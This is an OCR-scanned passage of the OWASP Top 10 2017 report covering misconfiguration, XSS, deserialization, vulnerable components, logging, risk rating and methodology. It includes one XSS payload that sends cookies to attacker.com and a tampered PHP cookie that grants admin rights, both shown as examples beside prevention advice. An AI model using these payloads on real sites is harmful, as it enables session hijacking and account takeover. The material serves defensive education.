applications that are not removed from the production server. 
These sample applications have known security flaws attackers 
use to compromise the server. If one of these applications is the 
admin console, and default accounts weren’t changed the 
attacker logs in with default passwords and takes over. 

Scenario #2: Directory listing is not disabled on the server. An 
attacker discovers they can simply list directories. The attacker 
finds and downloads the compiled Java classes, which they 
decompile and reverse engineer to view the code. The attacker 
then finds a serious access control flaw in the application. 

Scenario #3: The application server’s configuration allows de¬ 
tailed error messages, e.g. stack traces, to be returned to users. 
This potentially exposes sensitive information or underlying flaws 
such as component versions that are known to be vulnerable. 

Scenario #4: A cloud service provider has default sharing 
permissions open to the Internet by other CSP users. This allows 
sensitive data stored within cloud storage to be accessed. 


How to Prevent 

Secure installation processes should be implemented, including: 

• A repeatable hardening process that makes it fast and easy to 
deploy another environment that is properly locked down. 
Development, QA, and production environments should all be 
configured identically, with different credentials used in each 
environment. This process should be automated to minimize 
the effort required to setup a new secure environment. 

• A minimal platform without any unnecessary features, 
components, documentation, and samples. Remove or do not 
install unused features and frameworks. 

• A task to review and update the configurations appropriate to 
all security notes, updates and patches as part of the patch 
management process (see A9:2017-Usinq Components with 
Known Vulnerabilities ). In particular, review cloud storage 
permissions (e.g. S3 bucket permissions). 

• A segmented application architecture that provides effective, 
secure separation between components or tenants, with 
segmentation, containerization, or cloud security groups. 

• Sending security directives to clients, e.g. Security Headers . 

• An automated process to verify the effectiveness of the 
configurations and settings in all environments. 


References 

OWASP 

• OWASP Testing Guide: Configuration Management 

• OWASP Testing Guide: Testing for Error Codes 

• OWASP Security Headers Project 

For additional requirements in this area, see the Application 
Security Verification Standard VI9 Configuration . 

External 

• NIST Guide to General Server Hardening 

• CWE-2: Environmental Security Flaws 

• CWE-16: Configuration 

• CWE-388: Error Handling 

• CIS Security Configuration Guides/Benchmarks 

• Amazon S3 Bucket Discovery and Enumeration 
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App. Specific 


# Attack 


-K Security 

Vectors 


Weakness 


Impacts 


Exploitability: 3 

Prevalence: 3 

Detectability: 3 

Technical: 2 


Business ? 


Automated tools can detect and 
exploit all three forms of XSS, and 
there are freely available exploitation 
frameworks. 


XSS is the second most prevalent issue in the 
OWASP Top 10, and is found in around two-thirds of 
all applications. 

Automated tools can find some XSS problems 
automatically, particularly in mature technologies 
such as PHP, J2EE / JSP, and ASP.NET. 


The impact of XSS is moderate for 
reflected and DOM XSS, and severe 
for stored XSS, with remote code 
execution on the victim's browser, 
such as stealing credentials, 
sessions, or delivering malware to the 
victim. 


Is the Application Vulnerable? 

There are three forms of XSS, usually targeting users' browsers: 

Reflected XSS: The application or API includes unvalidated and 
unescaped user input as part of HTML output. A successful 
attack can allow the attacker to execute arbitrary HTML and 
JavaScript in the victim’s browser. Typically the user will need to 
interact with some malicious link that points to an attacker- 
controlled page, such as malicious watering hole websites, 
advertisements, or similar. 

Stored XSS: The application or API stores unsanitized user 
input that is viewed at a later time by another user or an 
administrator. Stored XSS is often considered a high or critical 
risk. 

DOM XSS: JavaScript frameworks, single-page applications, and 
APIs that dynamically include attacker-controllable data to a 
page are vulnerable to DOM XSS. Ideally, the application would 
not send attacker-controllable data to unsafe JavaScript APIs. 

Typical XSS attacks include session stealing, account takeover, 
MFA bypass, DOM node replacement or defacement (such as 
trojan login panels), attacks against the user's browser such as 
malicious software downloads, key logging, and other client-side 
attacks. 


Example Attack Scenario 

Scenario 1 : The application uses untrusted data in the 
construction of the following HTML snippet without validation or 
escaping: 

(String) page += "cinput name='creditcard' type=TEXT' 
value='" + request.getParameterfCC") + ,M >"; 

The attacker modifies the ‘CC’ parameter in the browser to: 

'><script>document.location= 

'http://www.attacker.com/cgi-bin/cookie.cgi? 

foo='+document.cookie</script>\ 

This attack causes the victim’s session ID to be sent to the 
attacker’s website, allowing the attacker to hijack the user’s 
current session. 

Note: Attackers can use XSS to defeat any automated Cross- 
Site Request Forgery ( CSRF) defense the application might 
employ. 


How to Prevent 

Preventing XSS requires separation of untrusted data from 

active browser content. This can be achieved by: 

• Using frameworks that automatically escape XSS by design, 
such as the latest Ruby on Rails, React JS. Learn the 
limitations of each framework's XSS protection and 
appropriately handle the use cases which are not covered. 

• Escaping untrusted HTTP request data based on the context in 
the HTML output (body, attribute, JavaScript, CSS, or URL) will 
resolve Reflected and Stored XSS vulnerabilities. The OWASP 
Cheat Sheet 'XSS Prevention' has details on the required data 
escaping techniques. 

• Applying context-sensitive encoding when modifying the 
browser document on the client side acts against DOM XSS. 
When this cannot be avoided, similar context sensitive 
escaping techniques can be applied to browser APIs as 
described in the OWASP Cheat Sheet 'DOM based XSS 
Prevention' . 

• Enabling a Content Security Policy (CSP) is a defense-in-depth 
mitigating control against XSS. It is effective if no other 
vulnerabilities exist that would allow placing malicious code via 
local file includes (e.g. path traversal overwrites or vulnerable 
libraries from permitted content delivery networks). 

References 

OWASP 

• OWASP Proactive Controls: Encode Data 

• OWASP Proactive Controls: Validate Data 

• OWASP Application Security Verification Standard: V5 

• OWASP Testing Guide: Testing for Reflected XSS 

• OWASP Testing Guide: Testing for Stored XSS 

• OWASP Testing Guide: Testing for DOM XSS 

• OWASP Cheat Sheet: XSS Prevention 

• OWASP Cheat Sheet: DOM based XSS Prevention 

• OWASP Cheat Sheet: XSS Filter Evasion 

• OWASP Java Encoder Project 

External 

• CWE-79: Improper neutralization of user supplied input 

• PortSwiqqer: Client-side template injection 
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App. Specific 


Exploitability: 1 


Exploitation of deserialization is 
somewhat difficult, as off the shelf 
exploits rarely work without changes 
or tweaks to the underlying exploit 
code. 




Security 

Weakness 


• Impacts 


Prevalence: 2 


Detectability: 2 


Technical: 3 


Business ? 


This issue is included in the Top 10 based on an 
industry survey and not on quantifiable data. 

Some tools can discover deserialization flaws, but 
human assistance is frequently needed to validate 
the problem. It is expected that prevalence data for 
deserialization flaws will increase as tooling is 
developed to help identify and address it. 


The impact of deserialization flaws 
cannot be understated. These flaws 
can lead to remote code execution 
attacks, one of the most serious 
attacks possible. 

The business impact depends on the 
protection needs of the application 
and data. 


Is the Application Vulnerable? 

Applications and APIs will be vulnerable if they deserialize hostile 

or tampered objects supplied by an attacker. 

This can result in two primary types of attacks: 

• Object and data structure related attacks where the attacker 
modifies application logic or achieves arbitrary remote code 
execution if there are classes available to the application that 
can change behavior during or after deserialization. 

• Typical data tampering attacks, such as access-control-related 
attacks, where existing data structures are used but the content 
is changed. 

Serialization may be used in applications for: 

• Remote- and inter-process communication (RPC/IPC) 

• Wire protocols, web services, message brokers 

• Caching/Persistence 

• Databases, cache servers, file systems 

• HTTP cookies, HTML form parameters, API authentication 
tokens 


Example Attack Scenarios 

Scenario #1 : A React application calls a set of Spring Boot 
microservices. Being functional programmers, they tried to 
ensure that their code is immutable. The solution they came up 
with is serializing user state and passing it back and forth with 
each request. An attacker notices the "R00" Java object 
signature, and uses the Java Serial Killer tool to gain remote 
code execution on the application server. 

Scenario #2: A PHP forum uses PHP object serialization to save 
a "super" cookie, containing the user's user ID, role, password 
hash, and other state: 

a:4:{i:0;i:132;i:1 ;s:7: ,, Mallory ,, ;i:2;s:4:"user"; 
i :3 ;s :32 : M b6a8b3bea87f e0e05022f 8f 3c88bc960";} 

An attacker changes the serialized object to give themselves 
admin privileges: 

a:4:{i:0;i:1 ;i:1 ;s:5: ,, Alice";i:2;s:5: ,, admin"; 
i :3 ;s :32 : M b6a8b3bea87f e0e05022f 8f 3c88bc960";} 


How to Prevent 

The only safe architectural pattern is not to accept serialized 

objects from untrusted sources or to use serialization mediums 

that only permit primitive data types. 

If that is not possible, consider one of more of the following: 

• Implementing integrity checks such as digital signatures on any 
serialized objects to prevent hostile object creation or data 
tampering. 

• Enforcing strict type constraints during deserialization before 
object creation as the code typically expects a definable set of 
classes. Bypasses to this technique have been demonstrated, 
so reliance solely on this is not advisable. 

• Isolating and running code that deserializes in low privilege 
environments when possible. 

• Logging deserialization exceptions and failures, such as where 
the incoming type is not the expected type, or the 
deserialization throws exceptions. 

• Restricting or monitoring incoming and outgoing network 
connectivity from containers or servers that deserialize. 

• Monitoring deserialization, alerting if a user deserializes 
constantly. 


References 

OWASP 

• OWASP Cheat Sheet: Deserialization 

• OWASP Proactive Controls: Validate All Inputs 

• OWASP Application Security Verification Standard 

• OWASP AppSecEU 2016: Surviving the Java Deserialization 

Apocalypse 

• OWASP AppSecUSA 2017: Friday the 13th JSON Attacks 

External 

• CWE-502: Deserialization of Untrusted Data 

• Java Unmarshaller Security 

• OWASP AppSec Cali 2015: Marshalling Pickles 
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Exploitability: 21 


Prevalence: 3 


Detectability: 2 


• Impacts 


Technical: 2 


Business ? 


While it is easy to find already-written 
exploits for many known 
vulnerabilities, other vulnerabilities 
require concentrated effort to develop 
a custom exploit. 


Prevalence of this issue is very widespread. 
Component-heavy development patterns can lead to 
development teams not even understanding which 
components they use in their application or API, 
much less keeping them up to date. 


Some scanners such as retire.js help in detection, 
but determining exploitability requires additional 
effort. 


While some known vulnerabilities 
lead to only minor impacts, some of 
the largest breaches to date have 
relied on exploiting known 
vulnerabilities in components. 
Depending on the assets you are 
protecting, perhaps this risk should 
be at the top of the list. 


Is the Application Vulnerable? 

You are likely vulnerable: 

• If you do not know the versions of all components you use 
(both client-side and server-side). This includes components 
you directly use as well as nested dependencies. 

• If software is vulnerable, unsupported, or out of date. This 
includes the OS, web/application server, database 
management system (DBMS), applications, APIs and all 
components, runtime environments, and libraries. 

• If you do not scan for vulnerabilities regularly and subscribe to 
security bulletins related to the components you use. 

• If you do not fix or upgrade the underlying platform, 
frameworks, and dependencies in a risk-based, timely fashion. 
This commonly happens in environments when patching is a 
monthly or quarterly task under change control, which leaves 
organizations open to many days or months of unnecessary 
exposure to fixed vulnerabilities. 

• If software developers do not test the compatibility of updated, 
upgraded, or patched libraries. 

• If you do not secure the components' configurations 
(see A6:2017-Securitv Misconfiquration ). 


Example Attack Scenarios 

Scenario #1 : Components typically run with the same privileges 
as the application itself, so flaws in any component can result in 
serious impact. Such flaws can be accidental (e.g. coding error) 
or intentional (e.g. backdoor in component). Some example 
exploitable component vulnerabilities discovered are: 

• CVE-2017-5638 , a Struts 2 remote code execution vulnerability 
that enables execution of arbitrary code on the server, has 
been blamed for significant breaches. 

• While internet of things (loT are frequently difficult or 
impossible to patch, the importance of patching them can be 
great (e.g. biomedical devices). 

There are automated tools to help attackers find unpatched or 
misconfigured systems. For example, the Shodan loT search 
engine can help you find devices that still suffer from 
the Heartbleed vulnerability that was patched in April 2014. 


How to Prevent 

There should be a patch management process in place to: 

• Remove unused dependencies, unnecessary features, 
components, files, and documentation. 

• Continuously inventory the versions of both client-side and 
server-side components (e.g. frameworks, libraries) and their 
dependencies using tools like versions , DependencvCheck , 
retire.js , etc. Continuously monitor sources like CVE and NVD 
for vulnerabilities in the components. Use software composition 
analysis tools to automate the process. Subscribe to email 
alerts for security vulnerabilities related to components you 
use. 

• Only obtain components from official sources over secure links. 
Prefer signed packages to reduce the chance of including a 
modified, malicious component. 

• Monitor for libraries and components that are unmaintained or 
do not create security patches for older versions. If patching is 
not possible, consider deploying a virtual patch to monitor, 
detect, or protect against the discovered issue. 

Every organization must ensure that there is an ongoing plan for 

monitoring, triaging, and applying updates or configuration 

changes for the lifetime of the application or portfolio. 


References 

OWASP 

• OWASP Application Security Verification Standard: VI 

Architecture, design and threat modelling 

• OWASP Dependency Check (for Java and .NET libraries) 

• OWASP Testing Guide: Map Application Architecture (OTG- 

INFQ-010) 

• OWASP Virtual Patching Best Practices 

External 

• The Unfortunate Reality of Insecure Libraries 

• MITRE Common Vulnerabilities and Exposures (CVE) search 

• National Vulnerability Database (NVD) 

• Retire.js for detecting known vulnerable JavaScript libraries 

• Node Libraries Security Advisories 

• Ruby Libraries Security Advisory Database and Tools 
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Detectability: 1 
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Business ? 


Exploitation of insufficient logging and 
monitoring is the bedrock of nearly 
every major incident. 

Attackers rely on the lack of 
monitoring and timely response to 
achieve their goals without being 
detected. 


This issue is included in the Top 10 based on an 

industry survey . 

One strategy for determining if you have sufficient 
monitoring is to examine the logs following 
penetration testing. The testers’ actions should be 
recorded sufficiently to understand what damages 
they may have inflicted. 


Most successful attacks start with 
vulnerability probing. Allowing such 
probes to continue can raise the 
likelihood of successful exploit to 
nearly 100%. 

In 2016, identifying a breach took an 

average of 191 days - plenty of time 
for damage to be inflicted. 


Is the Application Vulnerable? 

Insufficient logging, detection, monitoring and active response 

occurs any time: 

• Auditable events, such as logins, failed logins, and high-value 
transactions are not logged. 

• Warnings and errors generate no, inadequate, or unclear log 
messages. 

• Logs of applications and APIs are not monitored for suspicious 
activity. 

• Logs are only stored locally. 

• Appropriate alerting thresholds and response escalation 
processes are not in place or effective. 

• Penetration testing and scans by PAST tools (such as OWASP 
ZAP) do not trigger alerts. 

• The application is unable to detect, escalate, or alert for active 
attacks in real time or near real time. 

You are vulnerable to information leakage if you make logging 

and alerting events visible to a user or an attacker (see A3:2017- 

Sensitive Information Exposure ). 


Example Attack Scenarios 

Scenario #1 : An open source project forum software run by a 
small team was hacked using a flaw in its software. The 
attackers managed to wipe out the internal source code 
repository containing the next version, and all of the forum 
contents. Although source could be recovered, the lack of 
monitoring, logging or alerting led to a far worse breach. The 
forum software project is no longer active as a result of this 
issue. 

Scenario #2: An attacker uses scans for users using a common 
password. They can take over all accounts using this password. 
For all other users, this scan leaves only one false login behind. 
After some days, this may be repeated with a different password. 

Scenario #3: A major US retailer reportedly had an internal 
malware analysis sandbox analyzing attachments. The sandbox 
software had detected potentially unwanted software, but no one 
responded to this detection. The sandbox had been producing 
warnings for some time before the breach was detected due to 
fraudulent card transactions by an external bank. 


How to Prevent 

As per the risk of the data stored or processed by the 
application: 

• Ensure all login, access control failures, and server-side input 
validation failures can be logged with sufficient user context to 
identify suspicious or malicious accounts, and held for sufficient 
time to allow delayed forensic analysis. 

• Ensure that logs are generated in a format that can be easily 
consumed by a centralized log management solutions. 

• Ensure high-value transactions have an audit trail with integrity 
controls to prevent tampering or deletion, such as append-only 
database tables or similar. 

• Establish effective monitoring and alerting such that suspicious 
activities are detected and responded to in a timely fashion. 

• Establish or adopt an incident response and recovery plan, 
such as 1IST 800-61 rev 2 or later. 

There are commercial and open source application protection 
frameworks such as OWASP AppSensor , web application 
firewalls such as ModSecuritv with the OWASP ModSecuritv 
Core Rule Set , and log correlation software with custom 
dashboards and alerting. 
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What's Next for Developers 


Q3 


Establish & Use Repeatable Security Processes and Standard Security Controls 


Whether you are new to web application security or already very familiar with these risks, the task of producing a secure web 
application or fixing an existing one can be difficult. If you have to manage a large application portfolio, this task can be 
daunting. 

To help organizations and developers reduce their application security risks in a cost-effective manner, OWASP has 
produced numerous free and open resources that you can use to address application security in your organization. The 
following are some of the many resources OWASP has produced to help organizations produce secure web applications and 
APIs. On the next page, we present additional OWASP resources that can assist organizations in verifying the security of 
their applications and APIs. 


Application 

Security 

Requirements 


To produce a secure web application, you must define what secure means for that application. 
OWASP recommends you use the OWASP Application Security Verification Standard (ASVS) as a 

guide for setting the security requirements for your application(s). If you’re outsourcing, consider 
the OWASP Secure Software Contract Annex . Note: The annex is for US contract law, so please 
consult qualified legal advice before using the sample annex. 


V 
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Application 

Security 

Architecture 


Rather than retrofitting security into your applications and APIs, it is far more cost effective to 
design the security in from the start. OWASP recommends the OWASP Prevention Cheat Sheets 
as a good starting point for guidance on how to design security in from the beginning. 


Standard 

Security 

Controls 

\_ 
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Building strong and usable security controls is difficult. Using a set of standard security controls 
radically simplifies the development of secure applications and APIs. The OWASP Proactive 
Control: is a good starting point for developers, and many modern frameworks now come with 
standard and effective security controls for authorization, validation, CSRF prevention, etc. 


f N 

Secure 

Development 

Lifecycle 


v_ j 


To improve the process your organization follows when building applications and APIs, OWASP 
recommends the OWASP Software Assurance Maturity Model (SAMM) . This model helps 
organizations formulate and implement a strategy for software security that is tailored to the 
specific risks facing their organization. 
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Application 

Security 

Education 
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The OWASP Education Project provides training materials to help educate developers on web 
application security. For hands-on learning about vulnerabilities, try OWASP WebGoat , 
WebGoat.NET , OWASP NodeJS Goat , OWASP Juice Shop Project or the OWASP Broken Web 
Applications Project . To stay current, come to an OWASP AppSec Conference , OWASP 
Conference Training, or local OWASP Chapter meetings . 


There are numerous additional OWASP resources available for your use. Please visit the OWASP Projects page , which lists all the 
Flagship, Labs, and Incubator projects in the OWASP project inventory. Most OWASP resources are available on our wiki, and 
many OWASP documents can be ordered in hardcopy or as eBooks . 
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What's Next for Security Testers 


DU 


Establish Continuous Application Security Testing 


Building code securely is important. But it’s critical to verify that the security you intended to build is actually present, correctly 
implemented, and used everywhere it is supposed to be. The goal of application security testing is to provide this evidence. 
The work is difficult and complex, and modern high-speed development processes like Agile and DevOps have put extreme 
pressure on traditional approaches and tools. So we strongly encourage you to put some thought into how you are going to 
focus on what’s important across your entire application portfolio, and do it cost-effectively. 

Modern risks move quickly, so the days of scanning or penetration testing an application for vulnerabilities once every year or 
so are long gone. Modern software development requires continuous application security testing across the entire software 
development lifecycle. Look to enhance existing development pipelines with security automation that doesn’t slow 
development. Whatever approach you choose, consider the annual cost to test, triage, remediate, retest, and redeploy a 
single application, multiplied by the size of your application portfolio. 


r 


Understand 
the Threat 
Model 


Before you start testing, be sure you understand what’s important to spend time on. Priorities 
come from the threat model, so if you don’t have one, you need to create one before testing. 
Consider using OWASP ASVS and the OWASP Testing Guide as an input and don’t rely on tool 
vendors to decide what’s important for your business. 


V_/ 
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Understand 

Your 

SDLC 


V_ J 


Your approach to application security testing must be highly compatible with the people, 
processes, and tools you use in your software development lifecycle (SDLC). Attempts to force 
extra steps, gates, and reviews are likely to cause friction, get bypassed, and struggle to scale. 
Look for natural opportunities to gather security information and feed it back into your process. 


Testing 

Strategies 




"\ 

Choose the simplest, fastest, most accurate technique to verify each requirement. The OWASP 

Security Knowledge Framework and OWASP Application Security Verification Standard can be 

great sources of functional and nonfunctional security requirements in your unit and integration 
testing. Be sure to consider the human resources required to deal with false positives from the 
use of automated tooling, as well as the serious dangers of false negatives. 
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Achieving 

Coverage 

and 

Accuracy 

V_ 


No matter how good you are at testing, it won’t make any difference unless you communicate it 
effectively. Build trust by showing you understand how the application works. Describe clearly 
how it can be abused without “lingo” and include an attack scenario to make it real. Make a 
realistic estimation of how hard the vulnerability is to discover and exploit, and how bad that 
would be. Finally, deliver findings in the tools development teams are already using, not PDF 
files. 


Clearly 

Communicate 

Findings 

v__y 
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You don’t have to start out testing everything. Focus on what’s important and expand your 
verification program over time. That means expanding the set of security defenses and risks that 
are being automatically verified as well as expanding the set of applications and APIs being 
covered. The goal is to achieve a state where the essential security of all your applications and 
APIs is verified continuously. 
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What's Next for Organizations 



Start Your Application Security Program Now 


Application security is no longer optional. Between increasing attacks and regulatory pressures, organizations must establish 
effective processes and capabilities for securing their applications and APIs. Given the staggering amount of code in the 
numerous applications and APIs already in production, many organizations are struggling to get a handle on the enormous 
volume of vulnerabilities. 

OWASP recommends organizations establish an application security program to gain insight and improve security across 
their applications and APIs. Achieving application security requires many different parts of an organization to work together 
efficiently, including security and audit, software development, business, and executive management. Security should be 
visible and measurable, so that all the different players can see and understand the organization’s application security 
posture. Focus on the activities and outcomes that actually help improve enterprise security by eliminating or reducing risk. 
OWASP SAMM and the OWASP Application Security Guide for CISOs is the source of most of the key activities in this list. 


( ^ 

Get Started 

V_ J 


Document all applications and associated data assets. Larger organizations should consider 
implementing a Configuration Management Database (CMDB) for this purpose. 

Establish an application security program and drive adoption. 

Conduct a capability gap analysis comparing vour organization to vour peers to define key 
improvement areas and an execution plan. 

Gain management approval and establish an application security awareness campaign for the 
entire IT organization. 
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Risk Based 
Portfolio 
Approach 


v_y 


Identify the protection needs of your application portfolio from a business perspective. This 
should be driven in part by privacy laws and other regulations relevant to the data asset being 
protected. 

Establish a common risk rating model with a consistent set of likelihood and impact factors 
reflective of your organization's tolerance for risk. 

Accordingly measure and prioritize all your applications and APIs. Add the results to your CMDB. 
Establish assurance guidelines to properly define coverage and level of rigor required. 
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Enable with 
a Strong 
Foundation 


V_ J 


Establish a set of focused policies and standards that provide an application security baseline for 
all development teams to adhere to. 

Define a common set of reusable security controls that complement these policies and standards 
and provide design and development guidance on their use. 

Establish an application security training curriculum that is required and targeted to different 
development roles and topics. 


Integrate 

Security 

into 

Existing 

Processes 


Define and integrate secure implementation and verification activities into existing development 
and operational processes. Activities include threat modeling , secure design and design review , 
secure coding and code review , penetration testing , and remediation. 

Provide subject matter experts and support services for development and project teams to be 
successful. 


V_ J 
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Provide 

Management 

Visibility 


V_ J 


Manage with metrics. Drive improvement and funding decisions based on the metrics and 
analysis data captured. Metrics include adherence to security practices and activities, 
vulnerabilities introduced, vulnerabilities mitigated, application coverage, defect density by type 
and instance counts, etc. 

Analyze data from the implementation and verification activities to look for root cause and 
vulnerability patterns to drive strategic and systemic improvements across the enterprise. 

Learn from mistakes and offer positive incentives to promote improvements. 
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What's Next for Application 
Managers 


Manage the Full Application Lifecycle 


Applications belong to the most complex systems humans regularly create and maintain. IT management for an application 
should be performed by IT specialists who are responsible for the overall IT lifecycle of an application. We suggest 
establishing the role of application manager as technical counterpart to the application owner. The application manager is in 
charge of the whole application lifecycle from the IT perspective, from collecting the requirements until the process of retiring 
systems, which is often overlooked. 



r t 


Deployment, 
Testing, and 
Rollout 


V_ ¥ 


Automate the secure deployment of the application, interfaces and all required components, 
including needed authorizations. 

Test the technical functions and integration with the IT architecture and coordinate business tests. 
Create "use" and "abuse" test cases from technical and business perspectives. 

Manage security tests according to internal processes, the protection needs, and the assumed threat 
level by the application. 

Put the application in operation and migrate from previously used applications if needed. 

Finalize all documentation, including the change management data base (CMDB) and security 
architecture. 


r 

Operations 
and Change 
Management 


V_ J 


Operations must include guidelines for the security management of the application (e.g. patch 
management). 

Raise the security awareness of users and manage conflicts about usability vs. security. 

Plan and manage changes, e.g. migrate to new versions of the application or other components like 
OS, middleware, and libraries. 

Update all documentation, including in the CMDB and the security architecture, controls, and 
countermeasures, including any runbooks or project documentation. 


r 


v* 


Retiring 

Systems 


• Any required data should be archived. All other data should be securely wiped. 

• Securely retire the application, including deleting unused accounts and roles and permissions. 

• Set your application’s state to retired in the CMDB. 
































Note About Risks 



It's About the Risks that Weaknesses Represent 

The Risk Rating methodology for the Top 10 is based on the OWASP Risk Rating Methodology . For each Top 10 category, 
we estimated the typical risk that each weakness introduces to a typical web application by looking at common likelihood 
factors and impact factors for each common weakness. We then ordered the Top 10 according to those weaknesses that 
typically introduce the most significant risk to an application. These factors get updated with each new Top 10 release as 
things change and evolve. 

The OWASP Risk Rating Methodoloc defines numerous factors to help calculate the risk of an identified vulnerability. 
However, the Top 10 must talk about generalities, rather than specific vulnerabilities in real applications and APIs. 
Consequently, we can never be as precise as application owners or managers when calculating risks for their application(s). 
You are best equipped to judge the importance of your applications and data, what your threats are, and how your system 
has been built and is being operated. 

Our methodology includes three likelihood factors for each weakness (prevalence, detectability, and ease of exploit) and one 
impact factor (technical impact). The risk scales for each factor range from 1 -Low to 3-High with terminology specific for each 
factor. The prevalence of a weakness is a factor that you typically don’t have to calculate. For prevalence data, we have been 
supplied prevalence statistics from a number of different organizations (as referenced in the Acknowledgements on page 25), 
and we have aggregated their data together to come up with a Top 10 likelihood of existence list by prevalence. This data 
was then combined with the other two likelihood factors (detectability and ease of exploit) to calculate a likelihood rating for 
each weakness. The likelihood rating was then multiplied by our estimated average technical impact for each item to come up 
with an overall risk ranking for each item in the Top 10 (the higher the result the higher the risk). Detectability, Ease of Exploit, 
and Impact were calculated from analyzing reported CVEs that were associated with each of the Top 10 categories. 

Note: This approach does not take the likelihood of the threat agent into account. Nor does it account for any of the various 
technical details associated with your particular application. Any of these factors could significantly affect the overall likelihood 
of an attacker finding and exploiting a particular vulnerability. This rating does not take into account the actual impact on your 
business. Your organization will have to decide how much security risk from applications and APIs the organization is willing 
to accept given your culture, industry, and regulatory environment. The purpose of the OWASP Top 10 is not to do this risk 
analysis for you. 

The following illustrates our calculation of the risk for A6:2017-Securitv Misconfiquration . 
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Details About Risk Factors 
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Top 10 Risk Factor Summary 

The following table presents a summary of the 2017 Top 10 Application Security Risks, and the risk factors we have assigned 
to each risk. These factors were determined based on the available statistics and the experience of the OWASP Top 10 
team. To understand these risks for a particular application or organization, you must consider vour own specific threat 
agents and business impacts . Even severe software weaknesses may not present a serious risk if there are no threat agents 
in a position to perform the necessary attack or the business impact is negligible for the assets involved. 


RISK 

Threat 

Agents 

Attack 

■ ■ ■# 4 

Vectors 

r .,-N. Security # . 

""1/ Weakness 

..•impacts 

Technical Business 

Score 

Exploitability 

Prevalence Detectability 

A1:2017- 
Injection 

App 

Specific 

EASY: 3 

COMMON: 2 

EASY: 3 

SEVERE: 3 

App 

Specific 

8.0 

A2:2017- 

Authentication 

App 

Specific 

EASY: 3 

COMMON: 2 

AVERAGE: 2 

SEVERE: 3 

App 

Specific 

7.0 

A3:2017- 

Sens. Data Exposure 

App 

Specific 

AVERAGE: 2 

WIDESPREAD: 3 

AVERAGE: 2 

SEVERE: 3 

App 

Specific 

7.0 

A4:2017-XML Exter¬ 
nal Entities (XXE) 

App 

Specific 

j AVERAGE: 2 

COMMON: 2 

EASY: 3 

SEVERE: 3 

App 

Specific 

7.0 

A5:2017-Broken 
Access Control 

App 

Specific 

AVERAGE: 2 

COMMON: 2 

AVERAGE: 2 

SEVERE: 3 

App 

Specific 

6.0 

A6:2017-Security 
Misconfiguration 

App 

Specific 

EASY: 3 

WIDESPREAD: 3 

EASY: 3 

MODERATE: 2 

App 

Specific 

6.0 

A7:2017-Cross-Site 
Scripting (XSS) 

App 

Specific 

EASY: 3 

WIDESPREAD: 3 

EASY: 3 

MODERATE: 2 

App 

Specific 

6.0 

A8:2017-lnsecure 

Deserialization 

App 

Specific 

DIFFICULT: 1 

COMMON: 2 

AVERAGE: 2 

SEVERE: 3 

App 

Specific 

5.0 

A9:2017-Vulnerable 

Components 

App 

Specific 

AVERAGE: 2 

WIDESPREAD: 3 

AVERAGE: 2 

MODERATE: 2 

App 

Specific 

4.7 

A10:2017-Insufficient 
Logging&Monitoring 

App 

Specific 

j AVERAGE: 2 

WIDESPREAD: 3 

DIFFICULT: 1 

MODERATE: 2 

App 

Specific 

4.0 


Additional Risks to Consider 

The Top 10 covers a lot of ground, but there are many other risks you should consider and evaluate in your organization. 
Some of these have appeared in previous versions of the Top 10, and others have not, including new attack techniques that 
are being identified all the time. Other important application security risks (ordered by CWE-ID) that you should additionally 
consider include: 

• CWE-352: Cross-Site Request Forgery (CSRF1 

• CWE-400: Uncontrolled Resource Consumption ('Resource Exhaustion'. 'AppDoS'1 

• CWE-434: Unrestricted Upload of File with Dangerous Type 

• CWE-451: User Interface (UI1 Misrepresentation of Critical Information (Clickjacking and othersl 

• CWE-601: Unvalidated Forward and Redirects 

• CWE-799: Improper Control of Interaction Frequency (Anti-Automation) 

• CWE-829: Inclusion of Functionality from Untrusted Control Sphere (3rd Party Content) 

• CWE-918: Server-Side Request Forgery (SSRF1 
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Methodology and Data 


23 


Overview 


At the OWASP Project Summit, active participants and community members decided on a vulnerability view, with up to two 
(2) forward looking vulnerability classes, with ordering defined partially by quantitative data, and partially by qualitative 
surveys. 


Industry Ranked Survey 

For the survey, we collected the vulnerability categories that had been previously identified as being “on the cusp” or were 
mentioned in feedback to 2017 RC1 on the Top 10 mailing list. We put them into a ranked survey and asked respondents to 
rank the top four vulnerabilities that they felt should be included in the OWASP Top 10 - 2017. The survey was open from 
Aug 2 - Sep 18, 2017. 516 responses were collected and the vulnerabilities were ranked. 


Rank 

Survey Vulnerability Categories 

Score 

1 

Exposure of Private Information ('Privacy Violation') [CWE-359] 

748 

2 

Cryptographic Failures [CWE-310/311/312/326/327] 

584 

3 

Deserialization of Untrusted Data [CWE-502] 

514 

4 

Authorization Bypass Through User-Controlled Key (IDOR* & Path Traversal) [CWE-639] 

493 

5 

Insufficient Logging and Monitoring [CWE-223/ CWE-778] 

440 


Exposure of Private Information is clearly the highest-ranking vulnerability, but fits very easily as an additional emphasis into 
the existing A3:2017-Sensitive Data Exposure . Cryptographic Failures can fit within Sensitive Data Exposure. Insecure 
deserialization was ranked at number three, so it was added to the Top 10 as A8:2017-lnsecure Deserialization after risk 
rating. The fourth ranked User-Controlled Key is included in A5:2017-Broken Access Control : it is good to see it rank highly 
on the survey, as there is not much data relating to authorization vulnerabilities. The number five ranked category in the 
survey is Insufficient Logging and Monitoring, which we believe is a good fit for the Top 10 list, which is why it has become 
A10:2017-Insufficient Logging & Monitoring . We have moved to a point where applications need to be able to define what 
may be an attack and generate appropriate logging, alerting, escalation and response. 


Public Data Call 


Traditionally, the data collected and analyzed was more along the lines of frequency data: how many vulnerabilities were 
found in tested applications. As is well known, tools traditionally report all instances found of a vulnerability and humans 
traditionally report a single finding with a number of examples. This makes it very difficult to aggregate the two styles of 
reporting in a comparable manner. 

For 2017, the incidence rate was calculated by how many applications in a given data set had one or more of a specific 
vulnerability type. The data from many larger contributors was provided in two views. The first was the traditional frequency 
style of counting every instance found of a vulnerability, while the second was the count of applications in which each 
vulnerability was found in (one or more times). While not perfect, this reasonably allows us to compare the data from Human 
Assisted Tools and Tool Assisted Humans. The raw data and analysis work is available in GitHub . We intend to expand on 
this with additional structure for future versions of the Top 10. 

We received 40+ submissions in the call for data, and because many were from the original data call that was focused on 
frequency, we were able to use data from 23 contributors covering ~114,000 applications. We used a one-year block of time 
where possible and identified by the contributor. The majority of applications are unique, though we acknowledge the 
likelihood of some repeat applications between the yearly data from Veracode. The 23 data sets used were either identified 
as tool assisted human testing or specifically provided incidence rate from human assisted tools. Anomalies in the selected 
data of 100%+ incidence were adjusted down to 100% max. To calculate the incidence rate, we calculated the percentage of 
the total applications there were found to contain each vulnerability type. The ranking of incidence was used for the 
prevalence calculation in the overall risk for ranking the Top 10. 
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